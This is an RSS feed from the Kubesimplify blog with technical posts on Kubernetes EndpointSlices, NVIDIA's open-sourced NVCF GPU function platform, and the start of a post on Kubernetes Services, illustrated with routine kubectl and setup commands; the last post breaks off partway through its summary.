<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Kubesimplify]]></title><description><![CDATA[On a Mission to simplify AI and Cloud Native for everyone!]]></description><link>https://blog.kubesimplify.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1649087678065/oZZJ9QpqX.png</url><title>Kubesimplify</title><link>https://blog.kubesimplify.com</link></image><generator>RSS for Node</generator><lastBuildDate>Tue, 12 May 2026 06:38:19 GMT</lastBuildDate><atom:link href="https://blog.kubesimplify.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[How Kubernetes EndpointSlices Actually Work (and Why Endpoints Had to Die)]]></title><description><![CDATA[A Service has no pod IPs in it. We covered that in the last post. So somewhere, something is keeping a list of every pod IP that matches the Service's label selector. So that kube-proxy can program th]]></description><link>https://blog.kubesimplify.com/how-kubernetes-endpointslices-actually-work-and-why-endpoints-had-to-die</link><guid isPermaLink="true">https://blog.kubesimplify.com/how-kubernetes-endpointslices-actually-work-and-why-endpoints-had-to-die</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[#endpointslices]]></category><category><![CDATA[networking]]></category><category><![CDATA[kube-proxy]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Mon, 11 May 2026 17:09:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/35ce64fb-8023-4898-b97c-6265d74e56d2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A Service has no pod IPs in it. We covered that in the last post. So somewhere, something is keeping a list of every pod IP that matches the Service's label selector. So that kube-proxy can program the kernel. So that CoreDNS can answer a Headless lookup. <strong>That somewhere is an EndpointSlice.</strong></p>
<p>This post walks the full picture: why the original <code>Endpoints</code> API had to be replaced, what is actually inside a slice, the three conditions that decide whether traffic flows to a pod, how zone-aware routing works through topology hints, who watches these things, and a real cluster demo at the bottom. Every claim is verified against <code>kubernetes/kubernetes</code> 1.36 source and CoreDNS 1.11.</p>
<p><a class="embed-card" href="https://youtu.be/_MJ1ou-Oj-s?si=Zi9vHbI_Bf_snVlo">https://youtu.be/_MJ1ou-Oj-s?si=Zi9vHbI_Bf_snVlo</a></p>

<h2>TL;DR</h2>
<ol>
<li><p><strong>Why slices exist.</strong> The legacy <code>Endpoints</code> object held every backend pod IP in one blob. Three thousand pods meant a giant object, watched by every kube-proxy on every node, rewritten on every change. It did not scale. EndpointSlices (GA in 1.21) replaced it with many small objects capped at 100 endpoints each.</p>
</li>
<li><p><strong>What is in a slice.</strong> An <code>addressType</code> (<code>IPv4</code> or <code>IPv6</code>, plus an unused <code>FQDN</code>), a list of endpoints with conditions and a <code>targetRef</code> pointing back at the pod, a list of ports, and labels that bind it to its parent Service.</p>
</li>
<li><p><strong>Three conditions.</strong> <code>Serving</code> tracks the readiness probe. <code>Terminating</code> flips during pod deletion. <code>Ready</code> is the convenience flag — shorthand for <code>Serving=true AND Terminating=false</code>. The split exists so kube-proxy can keep using a draining pod that still answers requests.</p>
</li>
<li><p><strong>Topology hints.</strong> Each endpoint can carry a <code>hints.forZones</code> field. kube-proxy on a node in <code>us-east-1a</code> prefers endpoints hinted for that zone. Same-zone routing means lower latency and lower cross-zone traffic costs.</p>
</li>
<li><p><strong>Two watchers.</strong> kube-proxy and CoreDNS both watch EndpointSlices via the <code>discovery/v1</code> API. kube-proxy reprograms iptables. CoreDNS uses them to answer Headless-Service lookups directly with pod IPs.</p>
</li>
</ol>
<h2>Part 1: Why EndpointSlices exist</h2>
<p>To understand why EndpointSlices exist, look at what came before.</p>
<p>There was just one object per Service. The <code>Endpoints</code> object. One blob, with every backend pod IP inside it. Three pods? Fine. Three thousand pods? <strong>That object becomes huge.</strong> Every kube-proxy on every node watches it. Every change rewrites the entire blob. Every node re-receives the entire blob. The api-server chokes. kube-proxy chokes. The system did not scale.</p>
<p>The fix landed in Kubernetes 1.16 (alpha) and went GA in 1.21. Instead of one giant <code>Endpoints</code> object, you get many small <code>EndpointSlice</code> objects. Each one is capped at 100 endpoints by default. Add a pod, only the slice it lands in gets rewritten. Watchers only re-process that one slice. The api-server only ships one small object on the wire. <strong>Linear scaling instead of quadratic blow-up.</strong></p>
<p>The original <code>Endpoints</code> API is officially deprecated as of 1.33 (KEP-4974). It still gets written for backward compatibility, but EndpointSlices are the source of truth now, and modern controllers read slices, not the legacy object.</p>
<h2>Part 2: What is actually inside a slice</h2>
<p>When you create a Service, the EndpointSlice controller wakes up. It runs inside <code>kube-controller-manager</code>. It watches Services. It watches Pod changes. When either changes, it reconciles.</p>
<p>For each pod in the namespace that matches the Service's label selector and is <code>Ready</code>, the controller builds a slice entry: pod IP, pod node, ports, conditions. Then it writes or updates one or more <code>EndpointSlice</code> objects. The api-server validates them and writes them to etcd. kube-proxy and CoreDNS watch them via the api-server. Done.</p>
<p>A trimmed <code>kubectl describe endpointslice</code> looks like this:</p>
<pre><code class="language-plaintext">Name:         my-service-x29k9
Labels:       kubernetes.io/service-name=my-service
              endpointslice.kubernetes.io/managed-by=endpointslice-controller.k8s.io
AddressType:  IPv4
Ports:
  Name    Port  Protocol
  http    80    TCP
Endpoints:
  - Addresses:  10.244.1.42
    Conditions:
      Ready:        true
      Serving:      true
      Terminating:  false
    TargetRef:    Pod/nginx-abc-123
    NodeName:     worker
  - Addresses:  10.244.2.18
    Conditions:
      Ready:        true
      Serving:      true
      Terminating:  false
    TargetRef:    Pod/nginx-abc-456
    NodeName:     worker2
</code></pre>
<p>Five fields are doing all the work:</p>
<ul>
<li><p><code>addressType</code><strong>.</strong> <code>IPv4</code> or <code>IPv6</code>. Dual-stack Services get two slices, one for each protocol. There's a third value, <code>FQDN</code>, in the API enum, but no Kubernetes component implements behavior for it. We'll come back to this.</p>
</li>
<li><p><code>endpoints[]</code><strong>.</strong> The list. Each entry has <code>addresses</code> (the pod IP), <code>conditions</code> (the three flags we'll cover next), <code>targetRef</code> (a pointer back at the source Pod), and <code>nodeName</code> (used by topology routing).</p>
</li>
<li><p><code>ports[]</code><strong>.</strong> The Service's exposed ports, copied here so kube-proxy doesn't have to cross-reference.</p>
</li>
<li><p><code>labels</code><strong>.</strong> <code>kubernetes.io/service-name</code> is the binding label that tells every consumer which Service this slice belongs to. The <code>managed-by</code> label distinguishes slices written by the core controller from slices written by other controllers (Cilium, Antrea, MCS-API).</p>
</li>
<li><p><code>ownerReferences</code><strong>.</strong> Points at the parent Service so deletion cascades naturally.</p>
</li>
</ul>
<h3>Why 100?</h3>
<p>100 endpoints per slice is the default cap. It is a deliberate tradeoff.</p>
<p>Smaller slices means more API objects in etcd but fewer bytes per watch event. Bigger slices means fewer objects but every change rewrites a larger blob. 100 sits in the middle. A Service with 3 pods has 1 slice. A Service with 300 pods has 3. A Service with 3000 pods has 30. The cap is configurable up to 1000 via the <code>--max-endpoints-per-slice</code> flag on <code>kube-controller-manager</code>, but most clusters never need to touch it.</p>
<h2>Part 3: The three conditions</h2>
<p>Each endpoint has three condition flags. <code>Ready</code>. <code>Serving</code>. <code>Terminating</code>. They sound similar. They mean different things. And they decide whether traffic actually goes to that pod.</p>
<h3>Serving</h3>
<p><code>Serving</code> tracks the readiness probe. If the pod's readiness probe passes, <code>Serving = true</code>. The pod is willing and able to handle requests. kube-proxy can route traffic here.</p>
<p>This is the underlying truth flag. The other two are derived from it.</p>
<h3>Terminating</h3>
<p><code>Terminating = true</code> means the pod is being deleted. The Kubernetes controller observes the pod's <code>deletionTimestamp</code> and flips this flag.</p>
<p>kube-proxy normally stops sending <strong>new</strong> connections to a Terminating endpoint, so the pod can drain in peace. But there's a safety fallback: <strong>if every endpoint for a Service is Terminating</strong>, kube-proxy keeps routing traffic to them anyway, rather than dropping connections. This is the graceful-shutdown safeguard that stops a class of zero-downtime rollout bugs where the old pods are gone before the new pods are ready.</p>
<h3>Ready</h3>
<p><code>Ready</code> is the convenience flag. It is shorthand for <code>Serving = true AND Terminating = false</code>. A normal, accepting-traffic, not-being-deleted pod has <code>Ready = true</code>.</p>
<p>The reason the two flags are split: a pod <strong>can</strong> be Serving but not Ready, during graceful shutdown. It still answers requests, but it's being drained. This split was added so kube-proxy can make a smart decision: don't pick this pod for new connections, but keep any in-flight ones going. Without <code>Serving</code> as a separate flag, draining pods would be a much rougher transition.</p>
<table>
<thead>
<tr>
<th>State</th>
<th>Serving</th>
<th>Terminating</th>
<th>Ready</th>
<th>Routing</th>
</tr>
</thead>
<tbody><tr>
<td>Normal pod accepting traffic</td>
<td>true</td>
<td>false</td>
<td>true</td>
<td>yes</td>
</tr>
<tr>
<td>Pod failing readiness</td>
<td>false</td>
<td>false</td>
<td>false</td>
<td>no</td>
</tr>
<tr>
<td>Pod being drained</td>
<td>true</td>
<td>true</td>
<td>false</td>
<td>in-flight only, no new</td>
</tr>
<tr>
<td>Pod being killed</td>
<td>false</td>
<td>true</td>
<td>false</td>
<td>no</td>
</tr>
</tbody></table>
<h2>Part 4: AddressType, and the FQDN edge case</h2>
<p>The API defines three address types:</p>
<pre><code class="language-go">// k8s.io/api/discovery/v1/types.go
const (
    AddressTypeIPv4 = AddressType(v1.IPv4Protocol)
    AddressTypeIPv6 = AddressType(v1.IPv6Protocol)
    AddressTypeFQDN = AddressType("FQDN")
)
</code></pre>
<p>In practice, you only ever see two. Dual-stack Services produce two slices, one with <code>addressType: IPv4</code> and one with <code>addressType: IPv6</code>. Same Service, same conditions, different protocol.</p>
<p><code>FQDN</code> is a constant the API exposes. <strong>No core Kubernetes component implements behavior for it.</strong> The same <code>types.go</code> file states it directly:</p>
<blockquote>
<p>"The syntax and semantics of other addressType values are not defined. This must contain at least one address but no more than 100. EndpointSlices generated by the EndpointSlice controller will always have exactly 1 address."</p>
</blockquote>
<p>So <code>FQDN</code> is reserved space in the API. The EndpointSlice controller never produces it. kube-proxy doesn't program rules for it. CoreDNS doesn't resolve from it. If you create one manually, nothing happens.</p>
<p>It's there for hypothetical extensions: a controller could write FQDN-typed slices for things like external services, and a custom data plane could consume them. In a default cluster, treat the AddressType field as a binary IPv4-or-IPv6 flag.</p>
<h2>Part 5: Topology hints (zone-aware routing)</h2>
<p>This is the part most people don't know about.</p>
<p>Each endpoint can carry a <code>hints</code> field with <code>forZones</code> — a list of zones this endpoint is preferred for. kube-proxy reads these hints. If a pod is in <code>us-east-1a</code>, kube-proxy on a node in <code>us-east-1a</code> prefers endpoints hinted for that zone. <strong>Same-zone routing. Lower latency. Lower cross-zone egress costs</strong>, which on AWS / GCP can be a real bill line item.</p>
<h3>Where hints come from</h3>
<p>The EndpointSlice controller writes them. It reads the pod's node label <code>topology.kubernetes.io/zone</code>. If the Service has the annotation:</p>
<pre><code class="language-yaml">metadata:
  annotations:
    service.kubernetes.io/topology-mode: Auto
</code></pre>
<p>then the controller computes hints automatically, balancing endpoints across zones, weighted by each zone's allocatable CPU. The goal: each zone serves traffic proportional to its compute capacity. If <code>us-east-1a</code> has 60% of the cluster's CPU, it gets ~60% of the endpoints hinted for that zone.</p>
<p>Manual hints are also possible via the same annotation set to specific zone names, or via custom controllers that write hints directly. The auto mode is what most clusters use.</p>
<h3>When hints don't fire</h3>
<p>Auto mode has safety bailouts. If the zone distribution is too unbalanced — say one zone has all the pods — the controller drops hints entirely rather than route everything to that zone. kube-proxy without hints falls back to its normal round-robin behavior. This is intentional: same-zone routing is only safe when every zone has enough capacity to handle its own traffic.</p>
<h2>Part 6: Who watches EndpointSlices</h2>
<p>Two consumers. Both watch the same API.</p>
<h3>kube-proxy</h3>
<p>kube-proxy runs as a DaemonSet on every node. It has two informers: one on Services, one on EndpointSlices. When a slice changes, it diffs the new state against the kernel's current rules, then batches the changes into a single <code>iptables-restore</code> (or nftables, since 1.33). The whole rule set is replaced as one transaction.</p>
<p>Three nodes, three independent reprograms, all in parallel. Total time on a normal cluster: milliseconds per change.</p>
<h3>CoreDNS</h3>
<p>CoreDNS watches EndpointSlices through its <code>kubernetes</code> plugin. From <code>coredns/plugin/kubernetes/controller.go</code>:</p>
<pre><code class="language-go">import discovery "k8s.io/api/discovery/v1"

epLister, epController := object.NewIndexerInformer(
    &amp;cache.ListWatch{
        ListFunc:  endpointSliceListFunc(...),
        WatchFunc: endpointSliceWatchFunc(...),
    },
    &amp;discovery.EndpointSlice{},
    ...
)
</code></pre>
<p>For a normal Service, CoreDNS returns the ClusterIP — it doesn't actually need the slice to answer that query. The slices matter for <strong>Headless Services</strong> (<code>clusterIP: None</code>). For those, CoreDNS returns the pod IPs from the slice directly, no virtual IP, no kube-proxy in the path. This is how StatefulSets get per-pod DNS: <code>pod-0.my-statefulset.default.svc.cluster.local</code> resolves to one specific pod IP, pulled out of the slice.</p>
<p>Both watchers are list-watch. They get the initial state from a <code>List</code>, then incremental <code>ADDED</code> / <code>MODIFIED</code> / <code>DELETED</code> events via the watch stream. No polling.</p>
<h2>Part 7: A real cluster demo</h2>
<p>Let me show this on a real cluster. Three workers, a kind v1.35.1 cluster:</p>
<pre><code class="language-bash">$ kubectl get nodes
NAME                 STATUS   ROLES           AGE
kind-control-plane   Ready    control-plane   2m
kind-worker          Ready    &lt;none&gt;          2m
kind-worker2         Ready    &lt;none&gt;          2m
kind-worker3         Ready    &lt;none&gt;          2m
</code></pre>
<p>Apply a Deployment with three nginx pods and a Service:</p>
<pre><code class="language-bash">$ kubectl create deployment nginx --image=nginx --replicas=3
$ kubectl expose deployment nginx --port=80
</code></pre>
<h3>Three pods</h3>
<pre><code class="language-bash">$ kubectl get endpointslices -l kubernetes.io/service-name=nginx
NAME          ADDRESSTYPE   PORTS   ENDPOINTS                                     AGE
nginx-x29k9   IPv4          80      10.244.1.42,10.244.2.18,10.244.3.07           5s
</code></pre>
<p>One slice. Three endpoints. Each pod IP, each node, each Ready. Exactly what we expect for three pods.</p>
<p>Worth noticing: the slice itself was actually created <strong>the moment the Service was</strong>, as an empty placeholder. As each pod transitioned to Ready, the controller filled it in and updated the same slice object. The placeholder pattern means downstream watchers always have something to bind to, even before any pod is ready.</p>
<h3>Scale to 50</h3>
<pre><code class="language-bash">$ kubectl scale deployment nginx --replicas=50
</code></pre>
<p>Watch the slice:</p>
<pre><code class="language-bash">$ kubectl get endpointslices -l kubernetes.io/service-name=nginx
NAME          ADDRESSTYPE   PORTS   ENDPOINTS                                     AGE
nginx-x29k9   IPv4          80      10.244.1.42,10.244.1.43,... (50 entries)      2m
</code></pre>
<p>Still one slice. Fifty endpoints. Under the 100-endpoint default cap. kube-proxy on every node reprogrammed. CoreDNS, if this were a Headless Service, would now return all fifty IPs in the DNS answer.</p>
<h3>Scale to 200 — the slice splits</h3>
<pre><code class="language-bash">$ kubectl scale deployment nginx --replicas=200
</code></pre>
<pre><code class="language-bash">$ kubectl get endpointslices -l kubernetes.io/service-name=nginx
NAME          ADDRESSTYPE   PORTS   ENDPOINTS                       AGE
nginx-x29k9   IPv4          80      ... (100 entries)               3m
nginx-fz4mp   IPv4          80      ... (100 entries)               12s
</code></pre>
<p><strong>Two slices.</strong> One with 100 endpoints. One with another 100. kube-proxy reads both, stitches the rules together, and the Service has two hundred backends. The split is invisible to anyone using the Service. You curl one ClusterIP and the kernel picks one of the 200 pods.</p>
<h3>Rolling update</h3>
<p>Now do a rolling update — change the image, watch the slices in real time:</p>
<pre><code class="language-bash">$ kubectl set image deployment nginx nginx=nginx:1.27
$ kubectl get endpointslices -l kubernetes.io/service-name=nginx --watch
</code></pre>
<p>You see endpoints transition through every state we covered. Pods go <code>Terminating = true</code>. New pods land <code>Serving = true</code> once readiness passes. Slices update. kube-proxy reprograms on every change.</p>
<p>Total reprogramming time across the rolling update? <strong>A few seconds, distributed across nodes.</strong> The Service IP never changes. Traffic keeps flowing. End users see nothing.</p>
<h2>Wrap</h2>
<p>So that is the EndpointSlice. The bridge between a Service definition and the kernel rules that route real traffic.</p>
<p>One controller writes them. kube-proxy and CoreDNS watch them. Capped at 100 by default. Conditions for graceful shutdown. Topology hints for zone-aware routing. The placeholder pattern so downstream watchers always have something to bind to.</p>
<p>It's what makes Kubernetes Services scale to thousands of pods without falling over. Most people use Services every day and never think about the slices underneath. That's the point — the abstraction works.</p>
]]></content:encoded></item><item><title><![CDATA[NVCF Is Now Open Source: Inside NVIDIA's GPU Function Platform]]></title><description><![CDATA[NVIDIA just open-sourced the full NVCF platform under Apache 2.0. Not a thin SDK, not a client library. The actual control plane, invocation plane, compute plane, CLIs, Helm charts, and database migra]]></description><link>https://blog.kubesimplify.com/nvcf-is-now-open-source-inside-nvidia-s-gpu-function-platform</link><guid isPermaLink="true">https://blog.kubesimplify.com/nvcf-is-now-open-source-inside-nvidia-s-gpu-function-platform</guid><category><![CDATA[NVIDIA]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[GPU]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[cloudnative]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Mon, 11 May 2026 13:04:44 GMT</pubDate><enclosure url="https://raw.githubusercontent.com/saiyam1814/blogkit/main/covers/nvcf-deep-dive-cover.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>NVIDIA just open-sourced the full NVCF platform under Apache 2.0. Not a thin SDK, not a client library. The actual control plane, invocation plane, compute plane, CLIs, Helm charts, and database migrations, all in one monorepo at <a href="https://github.com/nvidia/nvcf">github.com/nvidia/nvcf</a>.</p>
<p>NVCF powers infrastructure behind services like <code>build.nvidia.com</code> and NVIDIA-hosted inference workflows across GPU cloud providers and DGX Cloud environments.. Now you can run the whole thing yourself and read every line that makes it work.</p>
<p>Let’s break down how the platform actually works.</p>
<hr />
<h2>What NVCF Actually Is</h2>
<p>NVCF stands for NVIDIA Cloud Functions. The original managed service let you register a Docker container or Helm chart, specify a GPU type, and NVIDIA handled everything: routing, queueing, autoscaling, multi-tenant isolation. GPU cloud partners like CoreWeave ran the NVIDIA Cluster Agent on their Kubernetes clusters so their GPUs could serve functions while NVIDIA owned the control plane.</p>
<p>The April 2026 Apache 2.0 release publishes that control plane. The previous repos (<code>NVIDIA/nvidia-cloud-functions</code>, <code>NVIDIA/nvcf-go</code>) are now archived. This monorepo is the one place everything lives.</p>
<p>One honest caveat: the control plane images are currently distributed via NVIDIA's NGC registry under the <code>nvcf-onprem</code> org. You need NGC access to deploy the full stack today. The source code is all Apache 2.0 and inspectable, but the deployable bundle still goes through NGC while <a href="https://github.com/NVIDIA/nvcf/issues/12">issue #12</a> (full OSS build) is open. I opened <a href="https://github.com/NVIDIA/nvcf/issues/14">issue #14</a> asking for a community contributor path.</p>
<hr />
<h2>Three-Plane Architecture</h2>
<p>The entire platform is built around three independently scalable planes connected through NATS JetStream.</p>
<img src="https://raw.githubusercontent.com/saiyam1814/blogkit/main/covers/nvcf-01-architecture.png" alt="NVCF Three-Plane Architecture" style="display:block;margin:0 auto" />

<p><strong>Control Plane</strong> runs on a dedicated Kubernetes cluster and owns function lifecycle, autoscaling decisions, and secrets management. Key services:</p>
<ul>
<li><p><code>function-autoscaler</code> (Rust): runs a 30-second scaling loop, reads utilization from VictoriaMetrics, writes decisions to Cassandra, calls the NVCF API to set desired instance counts</p>
</li>
<li><p><code>helm-reval</code> (Go): validates OCI-referenced Helm charts before the compute plane deploys them</p>
</li>
<li><p>OpenBao (Apache 2.0 Vault fork): all function secrets encrypted at rest, injected at runtime via the ess-agent sidecar</p>
</li>
<li><p>Cassandra: persistent state and distributed locks for the autoscaler</p>
</li>
</ul>
<p><strong>Invocation Plane</strong> sits between every caller and every GPU worker. Nothing bypasses it:</p>
<ul>
<li><p><code>http-invocation</code> (Rust / Axum): receives HTTP/gRPC requests, publishes to NATS JetStream, handles async polling</p>
</li>
<li><p><code>llm-gateway</code> (Go): OpenAI-compatible API with token-aware rate limiting via embedded Olric cache</p>
</li>
<li><p><code>grpc-proxy</code> (Go): forwards gRPC calls to function instances</p>
</li>
<li><p><code>ratelimiter</code> (Go): per-function rate limiting using Olric distributed cache</p>
</li>
<li><p><code>nats-auth-callout</code> (Go): NATS authentication with NKey, OIDC, and webhook strategies</p>
</li>
</ul>
<p><strong>Compute Plane</strong> is one NVCA (NVIDIA Cluster Agent) operator per GPU cluster. NVCA registers the cluster with the control plane, consumes NATS messages, and manages pod lifecycle.</p>
<hr />
<h2>How a Single Request Flows</h2>
<img src="https://raw.githubusercontent.com/saiyam1814/blogkit/main/covers/nvcf-02-request-flow.png" alt="Request Lifecycle" style="display:block;margin:0 auto" />

<p>Every invocation follows this path verified from the source code:</p>
<ol>
<li><p>Caller posts to <code>POST /v2/nvcf/pexec/functions/{id}</code></p>
</li>
<li><p><code>http-invocation</code> checks rate via <code>ratelimiter</code> gRPC</p>
</li>
<li><p>Request published to NATS stream: <code>Create.NVCA.*.{clusterID}.*.*</code> (from <code>nvca/pkg/queue/nats/client.go</code>)</p>
</li>
<li><p>NVCA queue manager consumes the message</p>
</li>
<li><p><code>ICMSRequest</code> Kubernetes CR created (deduplication by NATS sequence)</p>
</li>
<li><p>MiniService controller reconciles: creates Pod or applies Helm chart</p>
</li>
<li><p>Function pod connects back via <code>WorkerService</code> gRPC: <code>ConnectOnce</code></p>
</li>
<li><p>Response returns to the caller</p>
</li>
<li><p>On completion: <code>Terminate.NVCA.{clusterID}</code> triggers pod deletion and GC</p>
</li>
</ol>
<hr />
<h2>Scale-to-Zero: The NATS Buffer Approach</h2>
<p>This is the most important architectural decision in the whole codebase, and it is fundamentally different from how Knative handles scale-to-zero.</p>
<p>With Knative, requests can experience timeout or retry pressure during long scale-up events, especially for GPU workloads with heavy cold starts. That model works well for lightweight stateless HTTP services that initialize quickly. GPU inference workloads are different. Loading large models into VRAM can take tens of seconds or even minutes, making durable request buffering much more important.</p>
<p>NVCF uses NATS JetStream as a durable request buffer:</p>
<ol>
<li><p>Autoscaler drives desired instance count to 0. No pods running.</p>
</li>
<li><p>New request arrives. Published to NATS JetStream. Stream persists it durably.</p>
</li>
<li><p>Autoscaler detects queue depth &gt; 0. Sets desired instances to 1+.</p>
</li>
<li><p>NVCA receives creation message, launches pod.</p>
</li>
<li><p>Pod connects via WorkerService gRPC, pulls the buffered message.</p>
</li>
<li><p>Response returns through the still-open <code>http-invocation</code> connection.</p>
</li>
</ol>
<p>The request is never dropped. The caller waits longer on a cold start, but the request completes. This is only possible because the queue buffers it.</p>
<table>
<thead>
<tr>
<th></th>
<th>NATS JetStream</th>
<th>Knative</th>
</tr>
</thead>
<tbody><tr>
<td>Requests during scale-up</td>
<td>Buffered, zero dropped</td>
<td>Fail / timeout</td>
</tr>
<tr>
<td>Cold start behavior</td>
<td>Queue buffers, pod starts</td>
<td>Requests may face timeout or retry pressure during long cold starts</td>
</tr>
<tr>
<td>Multi-cluster routing</td>
<td>Per-cluster durable consumers</td>
<td>Single cluster only</td>
</tr>
<tr>
<td>Operational footprint</td>
<td>Purpose-built GPU inference platform</td>
<td>Requires full Knative stack</td>
</tr>
</tbody></table>
<hr />
<h2>Multi-Cluster by Design</h2>
<p>Each GPU cluster runs its own NVCA. NATS JetStream subjects are scoped per cluster:</p>
<pre><code class="language-plaintext">Creation:     Create.NVCA.*.{clusterID}.*.*
Termination:  Terminate.NVCA.{clusterID}
Consumer:     {streamName}-{clusterID}  (durable, per cluster)
</code></pre>
<p>A single control plane can manage GPU clusters across on-prem H100s, cloud H200s, GB200 NVLink nodes, and cloud provider partners simultaneously. The invocation plane routes based on the function deployment specification.</p>
<hr />
<h2>Setting Up Locally (What Works Without NGC Access)</h2>
<p>You can bootstrap the cluster and fake GPU layer without NGC credentials. The NVCF services deployment is what requires the <code>nvcf-onprem</code> org access.</p>
<pre><code class="language-bash"># Clone the repo
git clone https://github.com/nvidia/nvcf
cd nvcf/examples/self-hosted-local-development

# Bootstrap k3d cluster (6 nodes) + KWOK + fake GPU operator
# This works fully without NGC
./setup.sh

# Verify fake H100 nodes are registered
kubectl get nodes -l run.ai/simulated-gpu-node-pool=default
# NAME               STATUS   ROLES    GPU
# k3d-nvcf-agent-3   Ready    &lt;none&gt;   8x NVIDIA-H100-80GB-HBM3
# k3d-nvcf-agent-4   Ready    &lt;none&gt;   8x NVIDIA-H100-80GB-HBM3

# Deploy NVCF stack (requires NGC nvcf-onprem access)
helm registry login nvcr.io -u '\(oauthtoken' -p "\){NGC_API_KEY}"
HELMFILE_ENV=local helmfile sync
</code></pre>
<p>The fake GPU operator from <a href="https://github.com/run-ai/fake-gpu-operator">run-ai/fake-gpu-operator</a> adds <code>nvidia.com/gpu</code> extended resources to real Kubernetes nodes. Pods schedule and run. CUDA calls fail since there is no real GPU, but all NVCF orchestration, NATS dispatch, and scale-to-zero logic works exactly as in production.</p>
<hr />
<h2>How NVCF Compares</h2>
<table>
<thead>
<tr>
<th>Category</th>
<th>NVCF</th>
<th>KubeRay</th>
<th>KServe</th>
<th>Knative Serving</th>
</tr>
</thead>
<tbody><tr>
<td>Primary workload</td>
<td>Long-running GPU inference</td>
<td>Ray/Python distributed workloads</td>
<td>Multi-framework ML serving</td>
<td>Stateless HTTP services</td>
</tr>
<tr>
<td>Scale-to-zero</td>
<td>Durable NATS buffering</td>
<td>Ray autoscaling</td>
<td>Typically relies on Knative-style autoscaling</td>
<td>Request buffering with timeout/retry pressure during long cold starts</td>
</tr>
<tr>
<td>Multi-cluster</td>
<td>Built-in</td>
<td>Primarily single cluster</td>
<td>Primarily single cluster</td>
<td>No native multi-cluster orchestration</td>
</tr>
<tr>
<td>Function abstraction</td>
<td>Helm function type</td>
<td>No native function abstraction</td>
<td>No native function abstraction</td>
<td>No native function abstraction</td>
</tr>
<tr>
<td>GPU orchestration</td>
<td>KAI Scheduler + DRA integration</td>
<td>Standard Kubernetes scheduling</td>
<td>Standard Kubernetes scheduling</td>
<td>Standard Kubernetes scheduling</td>
</tr>
</tbody></table>
<p>KubeRay and NVCF are not competitors. You should be able to run Ray Serve under KubeRay as a NVCF function.</p>
<hr />
<h2>What the Open Source Release Actually Changes</h2>
<p><strong>Inspectability.</strong> Enterprises can now validate NVIDIA’s architectural decisions directly from the source code instead of treating the platform as a black box.</p>
<p><strong>Customization.</strong> You can modify the autoscaler Rust loop, add NATS auth strategies, extend the MiniService controller, or build new CLI commands. Earlier, these internals were largely inaccessible outside NVIDIA-managed environments.</p>
<hr />
<h2>Links</h2>
<ul>
<li><p>Repo: <a href="https://github.com/nvidia/nvcf">github.com/nvidia/nvcf</a></p>
</li>
<li><p>Docs: <a href="https://docs.nvidia.com/nvcf/overview">docs.nvidia.com/nvcf/overview</a></p>
</li>
<li><p>My PR: <a href="https://github.com/NVIDIA/nvcf/pull/13">NVIDIA/nvcf#13</a></p>
</li>
<li><p>NGC access issue: <a href="https://github.com/NVIDIA/nvcf/issues/14">NVIDIA/nvcf#14</a></p>
</li>
<li><p>Contribute / contact team: <a href="mailto:nvcf-interest@nvidia.com">nvcf-interest@nvidia.com</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[How a Kubernetes Service Actually Works (and All 5 Types You Need)]]></title><description><![CDATA[A pod gets created. It gets an IP. Then it dies. A new pod replaces it. New IP. Now imagine you have ten pods of the same app, and they restart all the time. Which IP do you call?
You can't. That's the problem Services solve, and the answer is more i...]]></description><link>https://blog.kubesimplify.com/how-a-kubernetes-service-actually-works-and-all-5-types-you-need</link><guid isPermaLink="true">https://blog.kubesimplify.com/how-a-kubernetes-service-actually-works-and-all-5-types-you-need</guid><category><![CDATA[cloud native]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[networking]]></category><category><![CDATA[service]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Tue, 05 May 2026 06:55:18 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1777964077380/f831367f-3bec-4384-bfd0-672eebd4ba65.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A pod gets created. It gets an IP. Then it dies. A new pod replaces it. New IP. Now imagine you have ten pods of the same app, and they restart all the time. <strong>Which IP do you call?</strong></p>
<p>You can't. That's the problem Services solve, and the answer is more interesting than "Kubernetes assigns a stable IP."</p>
<p>This post walks the full picture in five parts: why Services have to exist, what happens when you create one, what happens when traffic actually calls one, all five Service types (most posts stop at three), and a real cluster demo at the bottom. Every claim is verified against <code>kubernetes/kubernetes</code> 1.36 source.</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://youtu.be/uP4Gc08qeXM">https://youtu.be/uP4Gc08qeXM</a></div>
<h2 id="heading-tldr">TL;DR</h2>
<ol>
<li><strong>Why Services exist.</strong> Pods are ephemeral; their IPs change on every restart and reschedule. A Service is a stable identity for an unstable set of pods.</li>
<li><strong>Creation flow.</strong> <code>kubectl expose</code> → API server allocates a ClusterIP from <code>--service-cluster-ip-range</code> (since 1.33, backed by <code>IPAddress</code> objects, GA) → EndpointSlice controller fills the slice with matching pod IPs → kube-proxy on every node programs iptables → CoreDNS adds the name. Sub-second end to end.</li>
<li><strong>Request flow.</strong> <code>curl my-service</code> → CoreDNS returns ClusterIP → packet hits <code>KUBE-SERVICES</code> → matches <code>KUBE-SVC-XXX</code> → <code>--mode random</code> picks one rule → <code>KUBE-SEP-YYY</code> does DNAT to a pod IP → kernel routes to the backend → conntrack rewrites the source IP back to ClusterIP on the reply.</li>
